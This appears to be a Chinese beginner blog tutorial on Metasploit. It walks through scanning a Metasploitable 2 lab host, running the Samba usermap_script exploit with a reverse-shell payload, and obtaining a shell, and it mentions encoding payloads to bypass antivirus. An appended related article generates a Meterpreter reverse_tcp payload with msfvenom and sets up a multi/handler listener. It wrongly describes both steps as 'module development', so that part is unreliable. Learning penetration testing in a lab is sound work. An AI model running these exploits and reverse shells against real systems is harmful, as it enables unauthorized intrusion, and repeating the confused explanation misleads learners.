Metasploit技术初入门01

简介和开启

开启命令:msfconsole
开启界面如下:
在这里插入图片描述
MSF框架主要有五个模块组成,分别是
1 辅助模块
2 漏洞利用模块
3 攻击载荷模块
4 后期渗透模块
5 编码工具模块

渗透攻击步骤主要有:
1 扫描目标机系统,寻找可用漏洞
2 选择并配置一个漏洞利用模块
3 选择并配置一个攻击载荷模块
4 选择一个编码技术,用来绕过杀毒软件的查杀
5 渗透攻击

辅助模块的使用

本次使用的被攻击主机是Metasploitable 2,专门实验用的,自己百度装。
渗透测试的第一步是信息收集,所以我们在这里需要做的是主机扫描,主要关注IP地址,开放的服务和端口等。

使用辅助模块进行端口扫描,这里使用search命令搜索端口模块
在这里插入图片描述使用use选择模块,使用 show options查看参数设置,使用set 命令设置参数,run命令开始模块进程
在这里插入图片描述在这里插入图片描述如果发现启动不了,或者没结果等等破问题,重启你们的虚拟机,重启大法好啊!辅助模块种类特别多,多用就知道了,用法都差不多,不会就百度。

也可以用namp来替代辅助模块,直接输入nmap开启就行,然后输入命令nmap -O -Pn/-p0 URL命令 pn和p0就是不适用ping的方式
在这里插入图片描述

漏洞利用模块的使用

nmap查询开放的端口和开启的服务,命令是nmap -sV
在这里插入图片描述我们发现一个叫samba的服务,然后开始寻找对应的漏洞利用模块,命令search samba
在这里插入图片描述发现一个exploit/multi/samba/usermap_script 评价是excellent 而且比较新,就用它了
在这里插入图片描述
可以使用 info exploit/multi/samba/usermap_script 查看它的信息

在这里插入图片描述

使用use exploit/multi/samba/usermap_script 就可以用找个模块了
在这里插入图片描述

使用攻击载荷模块

使用show 命令查看该漏洞利用模块下有哪些攻击载荷模块
在这里插入图片描述根据我们之前nmap得到该系统是linux,所以选择linux对应的模块就行,我们选一个 cmd/unix/reverse,使用set命令选择它,看图 set PAYLOAD cmd/unix/reverse,然后show命令看它的参数
在这里插入图片描述使用set命令设置参数,RHOSET就是被攻击的IP,RPORT就是被攻击的端口,之前nmap扫出来的对应服务端口,相反L开头的就是主动攻击的IP和端口
在这里插入图片描述设置好后 run或者exploit命令开始攻击
在这里插入图片描述然后就得到个shell了

在这里插入图片描述shell已经建立,歇口气,接下来就是后渗透阶段了,这部分就厉害了,下次再说。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit是一款常用的漏洞利用工具,它主要由Ruby编写而成,能够帮助渗透测试人员、安全工程师和攻击者快速发现和利用漏洞。 在Metasploit中,可以通过编写module来扩展其功能。本文将介绍如何开发一个简单的Metasploit模块。 在开始之前,需要安装Metasploit框架。可以在官方网站(https://www.metasploit.com/)上下载并安装。 首先,我们需要创建一个新的模块。在终端中输入以下命令: ``` msfvenom --list payloads ``` 这将列出所有可用的payload。我们将使用其中的“windows/meterpreter/reverse_tcp”,该payload将在远程Windows系统上建立一个反向TCP连接。 接下来,我们需要编写一个模块,该模块将使用我们刚刚生成的payload。打开终端并输入以下命令: ``` msfconsole ``` 这将启动Metasploit控制台。接下来,输入以下命令以创建一个新的模块文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f raw -o payload.raw ``` 这将生成一个名为payload.raw的文件,该文件包含我们的payload。接下来,我们需要创建一个新的模块文件并将其命名为“reverse_tcp.rc”: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your IP> set LPORT <your port> set ExitOnSession false exploit -j -z ``` 这个模块使用“exploit/multi/handler”模块来建立一个反向TCP连接。它还使用我们刚刚生成的payload并设置了LHOST和LPORT。最后,它使用“-j”选项运行模块并保持在后台。 现在,我们可以使用以下命令来运行我们的模块: ``` msfconsole -r reverse_tcp.rc ``` 这将启动Metasploit控制台并运行我们的模块。此时,Metasploit将等待远程Windows系统与我们建立反向TCP连接。 以上就是一个简单的Metasploit模块的开发过程,这只是Metasploit模块开发的入门级别。更高级的Metasploit模块可以通过编写Ruby代码来实现更复杂的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值